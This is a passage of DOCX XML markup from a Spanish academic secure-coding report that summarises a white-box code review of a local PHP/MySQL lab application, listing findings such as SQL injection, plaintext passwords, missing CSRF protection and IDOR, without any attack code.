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1A2C3"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31EDF85E"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115E0CC9"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601D3E4E"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5CEC1485"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67DC1884"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01A576DE"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43CDE03D"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4C2069D7" w14:textId="77777777" w:rsidR="009F3A24" w:rsidRDefault="009F3A24" w:rsidP="009F3A24">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="44"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="076DDAEA" w14:textId="55771BF9" w:rsidR="009F3A24" w:rsidRPr="00245096" w:rsidRDefault="7A0F65F6" w:rsidP="1B937862">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="1B937862">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">INFORME TÉCNICO DE </w:t>
      </w:r>
      <w:r w:rsidR="56D92AB5" w:rsidRPr="1B937862">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>DESARROLLO SEGURO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C73E806"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2598FDAE"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7948CB55"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78AD74E3"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316A0FCB"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4CECA4CE"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2D7B464F"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6D450582"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0BF15101"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p>
    <w:p w14:paraId="43BD41BE"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4E900092"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0572C61F"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1F274803"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41027022"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1594A86A"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030D98BE"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3BA96746"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6CEBAF63"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28B45A55"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29FA41FA"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00C1D829" w14:textId="77777777" w:rsidR="009F3A24" w:rsidRDefault="009F3A24" w:rsidP="009F3A24">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17B434F3" w14:textId="07091315"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Fecha de ejecución: 08/09/2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DE9291" w14:textId="2FB9D9C7" w:rsidR="004F6929" w:rsidRDefault="009F3A24" w:rsidP="009F3A24">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 xml:space="preserve">Responsable de la evaluación: </w:t>
      </w:r>
      <w:r w:rsidR="003A1C80">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">Matias Zepeda </w:t>
      </w:r>
      <w:r w:rsidR="003A1C80">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:tab/>
        <w:t>Arrieta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501C1356" w14:textId="1D9E510C" w:rsidR="00245096" w:rsidRPr="009F3A24" w:rsidRDefault="00EA15A6" w:rsidP="009F3A24">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">Profesor: Jorge cortes </w:t>
      </w:r>
      <w:r w:rsidR="00674591">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A9A87B" w14:textId="77777777" w:rsidR="009F3A24" w:rsidRDefault="009F3A24" w:rsidP="009F3A24">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F3A24">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Resumen Ejecutivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B14E6D" w14:textId="77777777" w:rsidR="009F3A24" w:rsidRPr="009F3A24" w:rsidRDefault="009F3A24" w:rsidP="009F3A24">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A1A79F8" w14:textId="77777777" w:rsidR="009F3A24" w:rsidRDefault="009F3A24" w:rsidP="172CEFCA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Durante la ejecución de las actividades asociadas al presente informe, se realizó una revisión técnica de seguridad del proyecto web pnkSecurity (aplicación PHP + MySQL desarrollada como laboratorio de programación segura), con el propósito de identificar vulnerabilidades en el código fuente, la lógica de negocio, la gestión de sesiones y el manejo de datos de entrada, que puedan representar riesgos para la confidencialidad, integridad o disponibilidad del sistema y de la información que almacena.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C61F25" w14:textId="77777777" w:rsidR="00D21427" w:rsidRDefault="009F3A24" w:rsidP="172CEFCA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>Las actividades fueron realizadas bajo un enfoque de caja blanca (revisión manual de código fuente, sin framework de desarrollo), ejecutado sobre un entorno local de pruebas (XAMPP/WAMP), sin explotación activa contra sistemas en producción y respetando el alcance definido para esta evaluación académica.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA5B89E" w14:textId="77777777" w:rsidR="00D21427" w:rsidRDefault="00D21427"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8500" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblCellMar>
          <w:left w:w="70" w:type="dxa"/>
          <w:right w:w="70" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2680"/>
        <w:gridCol w:w="5820"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D520B" w:rsidRPr="002D520B" w14:paraId="42361136" w14:textId="77777777" w:rsidTr="3BF87DBC">
        <w:trPr>
          <w:trHeight w:val="315"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F4E79" w:themeFill="accent1" w:themeFillShade="80"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33A847A3" w14:textId="77777777" w:rsidR="002D520B" w:rsidRPr="002D520B" w:rsidRDefault="002D520B" w:rsidP="002D520B">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="F5F5F5"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="es-CL"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D520B">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="F5F5F5"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="es-CL"/>
              </w:rPr>
              <w:t>Ítem</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5820" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F4E79" w:themeFill="accent1" w:themeFillShade="80"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59D10192" w14:textId="77777777" w:rsidR="002D520B" w:rsidRPr="002D520B" w:rsidRDefault="002D520B" w:rsidP="002D520B">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="F5F5F5"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="es-CL"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D520B">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="F5F5F5"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="es-CL"/>
              </w:rPr>
              <w:t>Resultado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D520B" w:rsidRPr="002D520B" w14:paraId="78CE98F2" w14:textId="77777777" w:rsidTr="3BF87DBC">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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3F0FEC"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sidRPr="002D520B">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:lang w:eastAsia="es-CL"/>
              </w:rPr>
              <w:t>Activos evaluados</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5820" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21529944" w14:textId="2530CC8A" w:rsidR="002D520B" w:rsidRPr="002D520B" w:rsidRDefault="002D520B" w:rsidP="3BF87DBC">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Código fuente del proyecto pnkSecurity (PHP + MySQL) — entorno local de desarrollo (XAMPP/WAMP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D520B" w:rsidRPr="002D520B" w14:paraId="00361F38" w14:textId="77777777" w:rsidTr="3BF87DBC">
        <w:trPr>
          <w:trHeight w:val="600"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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CE748D"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sidRPr="002D520B">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:lang w:eastAsia="es-CL"/>
              </w:rPr>
              <w:t>Puertos abiertos identificados</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5820" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="135A09C9"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No aplica — evaluación de caja blanca (revisión de código fuente); no se realizó escaneo de puertos de red</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D520B" w:rsidRPr="002D520B" w14:paraId="3EF83C5A" w14:textId="77777777" w:rsidTr="3BF87DBC">
        <w:trPr>
          <w:trHeight w:val="384"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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58477D"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sidRPr="002D520B">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:lang w:eastAsia="es-CL"/>
              </w:rPr>
              <w:t>Servicios detectados</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5820" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50BB5D54"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Servidor web Apache local y motor de base de datos MySQL 8.0.17, accedidos vía localhost</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D520B" w:rsidRPr="002D520B" w14:paraId="0BC2FA7E" w14:textId="77777777" w:rsidTr="3BF87DBC">
        <w:trPr>
          <w:trHeight w:val="600"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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30248E"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sidRPr="002D520B">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:lang w:eastAsia="es-CL"/>
              </w:rPr>
              <w:t>Tecnologías observadas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5820" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55F74FF3"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PHP (procedural, sin framework), MySQLi, HTML5, Bootstrap 4, jQuery 3.2.1, MySQL 8.0.17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D520B" w:rsidRPr="002D520B" w14:paraId="0C2F9850" w14:textId="77777777" w:rsidTr="3BF87DBC">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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1065C0"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sidRPr="002D520B">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:lang w:eastAsia="es-CL"/>
              </w:rPr>
              <w:t>Hallazgos preliminares</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5820" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A1C5682"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22 hallazgos (9 Críticos / 5 Altos / 6 Medios / 2 Bajos)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D520B" w:rsidRPr="002D520B" w14:paraId="27E15121" w14:textId="77777777" w:rsidTr="3BF87DBC">
        <w:trPr>
          <w:trHeight w:val="600"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2680"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F2FBCC"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sidRPr="002D520B">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:lang w:eastAsia="es-CL"/>
              </w:rPr>
              <w:t>Nivel de exposición observado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5820" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CB28692"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b/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>CRÍTICO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09F21A69" w14:textId="77777777" w:rsidR="002D520B" w:rsidRDefault="002D520B"/>
    <w:p w14:paraId="27EBE332" w14:textId="77777777" w:rsidR="002D520B" w:rsidRDefault="002D520B" w:rsidP="002D520B">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-CL" w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D520B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-CL" w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Conclusión ejecutiva:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F77BFB8" w14:textId="77777777" w:rsidR="002D520B" w:rsidRDefault="002D520B" w:rsidP="172CEFCA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>La aplicación evaluada presenta una superficie de exposición crítica: se identificaron 22 hallazgos, entre los que destacan 8 puntos independientes de inyección SQL —uno de los cuales permite evadir por completo el mecanismo de autenticación—, almacenamiento de contraseñas en texto plano, ausencia de controles anti-CSRF, control de acceso incompleto (IDOR), fallas de lógica de negocio en el carrito de compras y falta de validación de entradas. Se recomienda una revisión y remediación prioritaria de los 9 hallazgos CRÍTICOS antes de considerar cualquier despliegue en un entorno productivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5002C56B" w14:textId="77777777" w:rsidR="002D520B" w:rsidRDefault="002D520B" w:rsidP="002D520B">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="155C6FF7" w14:textId="77777777" w:rsidR="002D520B" w:rsidRDefault="002D520B" w:rsidP="002D520B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D520B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Alcance de la Evaluación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16402542" w14:textId="77777777" w:rsidR="002D520B" w:rsidRDefault="002D520B" w:rsidP="172CEFCA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>La evaluación fue realizada sobre los siguientes activos, en el marco de un análisis de caja blanca (revisión de código fuente) ejecutado en un entorno local de desarrollo:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:br/>
        <w:t>Nota metodológica: dado que el objetivo evaluado corresponde a código fuente en un entorno local y no a un activo publicado en Internet, las secciones de este informe originalmente orientadas a reconocimiento de red (puertos, dominios, IP) fueron adaptadas a un enfoque de revisión estática y manual de código fuente (SAST manual), conforme a lo definido en la sección "Metodología Aplicada".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43544B38" w14:textId="741547E1" w:rsidR="172CEFCA" w:rsidRDefault="172CEFCA" w:rsidP="172CEFCA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="6820" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblCellMar>
          <w:left w:w="70" w:type="dxa"/>
          <w:right w:w="70" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1576"/>
        <w:gridCol w:w="2554"/>
        <w:gridCol w:w="2690"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D520B" w:rsidRPr="002D520B" w14:paraId="40A7AB2D" w14:textId="77777777" w:rsidTr="002D520B">
        <w:trPr>
          <w:trHeight w:val="315"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1860" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="1F4E78"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35E2163D" w14:textId="77777777" w:rsidR="002D520B" w:rsidRPr="002D520B" w:rsidRDefault="002D520B" w:rsidP="002D520B">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="es-CL"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D520B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="es-CL"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Tipo de </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002D520B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="es-CL"/>
              </w:rPr>
              <w:t>activo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1860" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="1F4E78"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
